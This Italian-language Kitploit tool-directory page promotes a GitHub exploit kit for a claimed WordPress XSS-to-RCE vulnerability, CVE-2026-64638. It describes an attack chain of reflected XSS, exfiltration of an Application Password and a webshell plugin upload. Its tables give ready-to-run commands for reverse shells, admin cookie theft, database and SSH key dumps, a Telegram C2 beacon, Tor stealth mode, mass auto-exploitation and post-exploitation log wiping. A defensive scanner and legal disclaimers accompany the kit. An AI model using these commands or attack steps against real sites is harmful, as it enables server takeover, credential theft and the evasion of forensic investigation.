Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-64638-PoC-Exploit — 🛡️ CVE-2026-64638 - Suite di valutazione della sicurezza WordPress (CVSS 8.9) | Toolkit per penetration test WordPress 4.7.0-7.0.2. Include moduli di valutazione delle vulnerabilità e analisi avanzata. 🐍 Controllo sicuro ed exploit, 2 modalità. Toolkit avanzato Blue&Red Team 2026-64638, solo uso autorizzato. Rimanete legali <3zd | Kitploit
Strumenti/GitHubGitHub/tc4dy/cve-2026-64638-poc-exploit
Escalation di PrivilegiScanner di VulnerabilitàMemory ForensicsMeccanismi di PersistenzaExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingCommand and Control

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

🛡️ CVE-2026-64638 - Suite di valutazione della sicurezza WordPress (CVSS 8.9) | Toolkit per penetration test WordPress 4.7.0-7.0.2. Include moduli di valutazione delle vulnerabilità e analisi avanzata. 🐍 Controllo sicuro ed exploit, 2 modalità. Toolkit avanzato Blue&Red Team 2026-64638, solo uso autorizzato. Rimanete legali <3zd

GitHubtc4dy/cve-2026-64638-poc-exploit

CVE-2026-64638-PoC-Exploit

Vedi Repository
181 mese faNon ancora revisionato
Condividi

CVE PoC

🌀 CVE‑2026‑64638 – WordPress XSS2Shell Security Suite

Python 3.8+ CVSS Author WordPress

⚠️ SOLO USO ETICO – TEST DI SICUREZZA AUTORIZZATI
Questo repository fornisce strumenti esclusivamente per professionisti della sicurezza autorizzati, blue team e penetration tester.
L'accesso non autorizzato a sistemi informatici è illegale ai sensi del CFAA (USA), Computer Misuse Act (Regno Unito), TCK 243/244 (Turchia) e leggi simili in tutto il mondo.


📖 Panoramica della vulnerabilità

CVE‑2026‑64638 è una vulnerabilità critica di XSS riflesso pre-autenticazione nelle versioni core di WordPress dalla 4.7.0 alla 7.0.2 che consente a un attaccante di escalare un attacco XSS a esecuzione remota di codice (RCE) completa tramite la funzionalità Application Password.

Come funziona

  1. Differenziale del parser – le funzioni PHP strip_tags() e wp_kses_post() di WordPress analizzano i tag HTML in modo diverso, consentendo a input dannosi di superare la sanificazione.
  2. XSS riflesso – un attaccante inietta un payload appositamente costruito nel modulo di login (wp-login.php). In caso di login fallito, il payload viene riflesso ed eseguito nel browser della vittima.
  3. Abuso dell'Application Password – il JavaScript iniettato genera automaticamente un'Application Password tramite l'API REST di WordPress, esfiltrandola verso l'attaccante.
  4. Caricamento del plugin (RCE) – utilizzando l'Application Password catturata, l'attaccante si autentica al pannello di amministrazione e carica un plugin dannoso contenente una webshell.
  5. Compromissione totale del sistema – la webshell consente l'esecuzione di comandi di sistema, permettendo reverse shell, persistenza, movimento laterale e completa presa di controllo del server.

Versioni interessate

  • WordPress 4.7.0 – 7.0.2 – vulnerabile
  • WordPress 7.0.3 e successive – corrette
  • Gli aggiornamenti di sicurezza sono stati riportati a tutti i rami mantenuti

Patch

  • Aggiornare a WordPress 7.0.3 o successivo.
  • Se l'aggiornamento non è possibile, disattivare la funzionalità Application Password come soluzione temporanea.

🧰 Strumenti

StrumentoScopoUtente previsto
exploit.pyToolkit di sfruttamento completo con reverse shell, persistenza, C2, escalation dei privilegi, analisi forense della memoria, dump del database, estrazione di chiavi SSH e scansione di massa.

📊 Confronto delle funzionalità


🎯 Riepilogo dei casi d'uso


⚙️ Installazione

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]

📋 Parametri

Parametri di exploit.py

Parametri di safecheck.py


💥 Scenari


📊 Comandi della shell interattiva


🧪 Utilizzo di endpoint e API

EndpointScopo
/wp-login.phpPagina di login – punto di iniezione XSS
/wp-admin/authorize-application.php

🛡️ Uso responsabile

  • Utilizzare questi strumenti solo su sistemi di propria proprietà o per i quali si dispone di esplicita autorizzazione scritta al test.
  • L'accesso non autorizzato è illegale e non etico.
  • Gli autori non sono responsabili di qualsiasi uso improprio.
  • Rispettare sempre le leggi e le normative del proprio paese.

Questo software è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.

Conformità legale

Scarica lo strumento
Red team / penetration tester autorizzati
safecheck.pyVerificatore non intrusivo di vulnerabilità che rileva la riflessione XSS e valuta il livello di sicurezza senza eseguire alcun payload dannoso. Genera report dettagliati.Blue team / auditor di sicurezza
Funzionalitàexploit.pysafecheck.py
Rilevamento vulnerabilità✅✅
Rilevamento versione WordPress✅✅
Rilevamento riflessione XSS✅✅
Cattura Application Password✅❌
Caricamento plugin (RCE)✅❌
Reverse shell✅❌
Beacon C2 (HTTP/DNS/Telegram)✅❌
Escalation dei privilegi✅❌
Analisi forense della memoria✅❌
Dump del database✅❌
Estrazione chiavi SSH✅❌
Metodi di persistenza✅❌
Audit delle intestazioni di sicurezza❌✅
Verifica esposizione file di configurazione❌✅
Verifica elenco directory❌✅
Verifica esposizione phpinfo❌✅
Scansione di massa✅✅
Supporto proxy✅✅
Supporto Tor✅✅
Tunneling Ngrok✅❌
Shell interattiva✅❌
Modalità non intrusiva (sicura)❌✅
Output JSON / report✅✅
ScenarioStrumento consigliato
Blue Team – verifica se l'installazione WordPress è vulnerabilesafecheck.py
Security Audit – valutazione non intrusiva delle vulnerabilitàsafecheck.py
Red Team – test di penetrazione autorizzati con sfruttamento completoexploit.py
Bug Bounty – test di divulgazione responsabilesafecheck.py
Mass Scanning – verifica di più target per la vulnerabilitàexploit.py o safecheck.py
Incident Response – verifica se i sistemi sono compromessisafecheck.py
Advanced Post‑Exploitation – persistenza, C2, analisi forenseexploit.py
ParametroDescrizione
-t, --targetURL del WordPress target (es. https://wordpress-site.com)
-l, --listFile contenente l'elenco dei target (uno per riga) per la scansione di massa
--lhostIndirizzo IP locale per i callback della reverse shell
--lportPorta locale per la reverse shell (default: 4444)
--proxyProxy HTTP/HTTPS (es. http://127.0.0.1:8080)
--timeoutTimeout delle richieste in secondi (default: 10)
--retryNumero di tentativi (default: 3)
--threadsNumero di thread per la scansione di massa (default: 5)
--exploitSfrutta automaticamente i target vulnerabili durante la scansione di massa
--ngrok-tokenAuthtoken Ngrok per tunneling esterno
--payload-typeTipo di payload XSS: reflected, dom_based, waf_bypass, case_manipulation, double_encoded
--session-hijackAbilita il dirottamento della sessione (ruba i cookie admin)
--dump-dbEsegue il dump del database WordPress (richiede pymysql)
--extract-sshEstrae le chiavi SSH dal sistema target
--torInstrada il traffico attraverso Tor (socks5h://127.0.0.1:9050)
--stealthAbilita la modalità stealth (header contraffatti, richieste ritardate)
--no-cleanupSalta la pulizia dei log dopo lo sfruttamento
--ssl-verifyVerifica i certificati SSL
--c2-typeTipo di C2: http, dns, telegram
--c2-serverURL del server C2 o token del bot Telegram
--auto-priv-escEscalation automatica dei privilegi dopo la shell
--memory-forensicsAbilita il modulo di analisi forense della memoria
-v, --verboseOutput verboso
-q, --quietModalità silenziosa (output minimo)
ParametroDescrizione
-t, --targetURL del WordPress target (es. https://wordpress-site.com)
-l, --listFile contenente l'elenco dei target (uno per riga) per la scansione di massa
--timeoutTimeout delle richieste in secondi (default: 10)
--retryNumero di tentativi (default: 3)
--threadsNumero di thread per la scansione di massa (default: 5)
--proxyProxy HTTP/HTTPS (es. http://127.0.0.1:8080)
--torInstrada il traffico attraverso Tor (socks5h://127.0.0.1:9050)
--ssl-verifyVerifica i certificati SSL
--outputFile di report JSON in output
-v, --verboseOutput verboso
-q, --quietModalità silenziosa (output minimo)
#ScenarioComando
1Controllo rapido della vulnerabilitàpython safecheck.py -t https://wordpress-site.com
2Scansione dettagliata con reportpython safecheck.py -t https://wordpress-site.com --output report.json -v
3Sfruttamento completo con reverse shellpython exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit
4Usa payload XSS personalizzatopython exploit.py -t https://wordpress-site.com --payload-type waf_bypass
5Dirottamento della sessione (ruba cookie admin)python exploit.py -t https://wordpress-site.com --session-hijack
6Dump del database WordPresspython exploit.py -t https://wordpress-site.com --dump-db
7Estrazione delle chiavi SSHpython exploit.py -t https://wordpress-site.com --extract-ssh
8Usa Tor per l'anonimatopython exploit.py -t https://wordpress-site.com --tor --stealth
9Beacon C2 con Telegrampython exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id"
10Scansione di massa da filepython exploit.py -l targets.txt --threads 10 --exploit
11Analisi forense della memoria dopo la shellpython exploit.py -t https://wordpress-site.com --memory-forensics
12Escalation automatica dei privilegipython exploit.py -t https://wordpress-site.com --auto-priv-esc
13Shell interattivapython exploit.py -t https://wordpress-site.com -i
14Tunneling Ngrokpython exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN
ComandoDescrizione
reverseAvvia il listener della reverse shell
persistApplica metodi di persistenza (cron, systemd, rc.local, SSH, WP)
cleanPulisce i log di sistema e la cronologia
dumpdbDump del database WordPress
sshEstrae le chiavi SSH
privEscalation automatica dei privilegi
memEsegue analisi forense della memoria
c2Mostra lo stato del C2
c2taskControlla la presenza di attività C2
exitEsci dalla shell interattiva
Generazione Application Password
/wp-admin/update.php?action=upload-pluginCaricamento plugin (RCE)
/wp-content/plugins/{slug}/{slug}.phpEsecuzione webshell
PaeseLegge pertinente
Stati UnitiComputer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030
Regno UnitoComputer Misuse Act 1990
TurchiaTCK 243 (Accesso non autorizzato), TCK 244 (Interferenza con il sistema)
GermaniaStGB § 202a (Spionaggio informatico), § 202b (Intercettazione dati)
FranciaLoi Godfrain – Article 323-1
AustraliaCybercrime Act 2001
CanadaCriminal Code – Section 342.1
IndiaInformation Technology Act 2000 – Sezione 43, 66
GiapponeLegge sul divieto di accesso non autorizzato ai computer